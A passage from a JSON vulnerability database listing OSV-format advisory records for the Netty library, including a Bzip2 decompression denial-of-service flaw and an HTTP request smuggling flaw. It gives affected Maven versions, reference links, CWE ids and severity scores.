"3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-f256-j965-7f32/GHSA-f256-j965-7f32.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32" }, { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/b0fa4d5aab4215f3c22ce6123dd8dd5f38dc0432" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re39391adcb863f0e9f3f15e7986255948f263f02e4700b82453e7102@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re1911e05c08f3ec2bab85744d788773519a0afb27272a31ac2a0b4e8@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd5715f3ee5e3216d5e0083a07994f67da6dbb9731ce9e7a6389b18e@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd206d9dd7eb894cc089b37fe6edde2932de88d63a6d8368b44f5101@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4a6b7dec38ea6cd28b6f94bd4b312629a52b80be3786d5fb0e474bc@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcae42fba06979934208bbd515584b241d3ad01d1bb8b063512644362@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca0978b634a0c3ebee4126ec29c7f570b165fae3f8f3658754c1cbd3@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbde2f13daf4911504f0eaea43eee4f42555241b5f6d9d71564b6c5fa@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rba2a9ef1d0af882ab58fadb336a58818495245dda43d32a7d7837187@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rafc77f9f03031297394f3d372ccea751b23576f8a2ae9b6b053894c5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rac8cf45a1bab9ead5c9a860cbadd6faaeb7792203617b6ec3874736d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa413040db6d2197593cc03edecfd168732e697119e6447b0a25d525@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra66e93703e3f4bd31bdfd0b6fb0c32ae96b528259bb1aa2b6d38e401@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4b0141939370304d676fe23774d0c6fbc584b648919825402d0cb39@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re7c69756a102bebce8b8681882844a53e2f23975a189363e68ad0324@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9e6ed60941da831675de2f8f733c026757fb4fa28a7b6c9f3dfb575@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/redef0fb5474fd686781007de9ddb852b24f1b04131a248d9a4789183@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf148b2bf6c2754153a8629bc7495e216bd0bd4c915695486542a10b4@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf38e4dcdefc7c59f7ba0799a399d6d6e37b555d406a1dfc2fcbf0b35@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf521ff2be2e2dd38984174d3451e6ee935c845948845c8fccd86371d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf934292a4a1c189827f625d567838d2c1001e4739b158638d844105b@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210604-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21295" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b09f3e31e004fe583f677f7afa46bd30110904576c13c5ac818ac2c@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0ca82fec33334e571fe5b388272260778883e307e15415d7b1443de2@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r101f82d8f3b5af0bf79aecbd5b2dd3b404f6bb51d1a54c2c3d29bed9@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b3cb056364794f919aaf26ceaf7423de64e7fdd05a914066e7d5219@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2732aa3884cacfecac4c54cfaa77c279ba815cad44b464a567216f83@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31044fb995e894749cb821c6fe56f487c16a97028e6e360e59f09d58@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a98827bb4a7edbd69ef862f2351391845697c40711820d10df52ca5@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4b8be87acf5b9c098a2ee350b5ca5716fe7afeaf0a21a4ee45a90687@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4ea2f1a9d79d4fc1896e085f31fb60a21b1770d0a26a5250f849372d@%3Cissues.kudu.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5baac01f9e06c40ff7aab209d5751b3b58802c63734e33324b70a06a@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5cbea8614812289a9b98d0cfc54b47f54cef424ac98d5e315b791795@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f2f120b2b8d099226473db1832ffb4d7c1d6dc2d228a164bf293a8e@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r602e98daacc98934f097f07f2eed6eb07c18bfc1949c8489dc7bfcf5@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r61564d86a75403b854cdafee67fc69c8b88c5f6802c2c838f4282cc8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r69efd8ef003f612c43e4154e788ca3b1f837feaacd16d97854402355@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dac9bd799ceac499c7a7e152a9b0dc7f2fe7f89ec5605d129bb047b@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70c3a7bfa904f06a1902f4df20ee26e4f09a46b8fd3eb304dc57a2de@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7879ddcb990c835c6b246654770d836f9d031dee982be836744e50ed@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7b54563abebe3dbbe421e1ba075c2030d8d460372f8c79b7789684b6@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r823d4b27fcba8dad5fe945bdefce3ca5a0031187966eb6ef3cc22ba9@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r855b4b6814ac829ce2d48dd9d8138d07f33387e710de798ee92c011e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r967002f0939e69bdec58f070735a19dd57c1f2b8f817949ca17cddae@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ec78dc409f3f1edff88f21cab53737f36aad46f582a9825389092e0@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9fe840c36b74f92b8d4a089ada1f9fd1d6293742efa18b10e06b66d2@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra64d56a8a331ffd7bdcd24a9aaaeeedeacd5d639f5a683389123f898@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra655e5cec74d1ddf62adacb71d398abd96f3ea2c588f6bbf048348eb@%3Cissues.kudu.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2021-03-30T15:03:26Z", "nvd_published_at": "2021-03-30T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-grg4-wf29-r9vv", "published": "2021-09-09T17:11:21Z", "modified": "2024-03-11T05:19:43.929590Z", "aliases": [ "CVE-2021-37136" ], "related": [ "CGA-xpcq-6m7h-f8qc", "CVE-2021-37136" ], "summary": "Bzip2Decoder doesn't allow setting size restrictions for decompressed data", "details": "### Impact\nThe Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression).\n\n\nAll users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack\n\n### Workarounds\nNo workarounds other than not using the `Bzip2Decoder`\n\n### References\n\nRelevant code areas:\n\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294\nhttps://github.com/netty/netty/blob/netty-4.1.67.Final/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305", "affected": [ { "package": { "name": "io.netty:netty-codec", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.1.68.Final" } ] } ], "versions": [ "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8", "4.0.0.Beta1", "4.0.0.Beta2", "4.0.0.Beta3", "4.0.0.CR1", "4.0.0.CR2", "4.0.0.CR3", "4.0.0.CR4", "4.0.0.CR5", "4.0.0.CR6", "4.0.0.CR7", "4.0.0.CR8", "4.0.0.CR9", "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.61.Final", "4.1.62.Final", "4.1.63.Final", "4.1.64.Final", "4.1.65.Final", "4.1.66.Final", "4.1.67.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-grg4-wf29-r9vv/GHSA-grg4-wf29-r9vv.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/netty/netty/security/advisories/GHSA-grg4-wf29-r9vv" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37136" }, { "type": "WEB", "url": "https://github.com/netty/netty/commit/41d3d61a61608f2223bb364955ab2045dd5e4020" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5316" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0012" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb2bf8597e53364ccab212fbcbb2a4e9f0a9e1429b1dc08023c6868e@%3Cdev.tinkerpop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd262f59b1586a108e320e5c966feeafbb1b8cdc96965debc7cc10b16@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r75490c61c2cb7b6ae2c81238fd52ae13636c60435abcd732d41531a0@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e05eba32476c580412f9fbdfc9b8782d5b40558018ac4ac07192a04@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5406eaf3b07577d233b9f07cfc8f26e28369e6bab5edfcab41f28abb@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06a145c9bd41a7344da242cef07977b24abe3349161ede948e30913d@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L80" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L305" }, { "type": "WEB", "url": "https://github.com/netty/netty/blob/4.1/codec/src/main/java/io/netty/handler/codec/compression/Bzip2Decoder.java#L294" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-09-09T14:36:56Z", "nvd_published_at": "2021-10-19T15:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p2v9-g2qv-p635", "published": "2020-02-21T18:55:04Z", "modified": "2024-12-08T05:34:35.794525Z", "aliases": [ "CVE-2019-20445" ], "related": [ "CGA-3hw4-v37p-xv4c", "CGA-f836-4mqx-vr2w" ], "summary": "HTTP Request Smuggling in Netty", "details": "HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header.", "affected": [ { "package": { "name": "io.netty:netty-handler", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-handler" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.45" } ] } ], "versions": [ "4.0.0.Final", "4.0.1.Final", "4.0.10.Final", "4.0.11.Final", "4.0.12.Final", "4.0.13.Final", "4.0.14.Beta1", "4.0.14.Final", "4.0.15.Final", "4.0.16.Final", "4.0.17.Final", "4.0.18.Final", "4.0.19.Final", "4.0.2.Final", "4.0.20.Final", "4.0.21.Final", "4.0.22.Final", "4.0.23.Final", "4.0.24.Final", "4.0.25.Final", "4.0.26.Final", "4.0.27.Final", "4.0.28.Final", "4.0.29.Final", "4.0.3.Final", "4.0.30.Final", "4.0.31.Final", "4.0.32.Final", "4.0.33.Final", "4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.5.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-p2v9-g2qv-p635/GHSA-p2v9-g2qv-p635.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20445" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/9861" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9865" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": 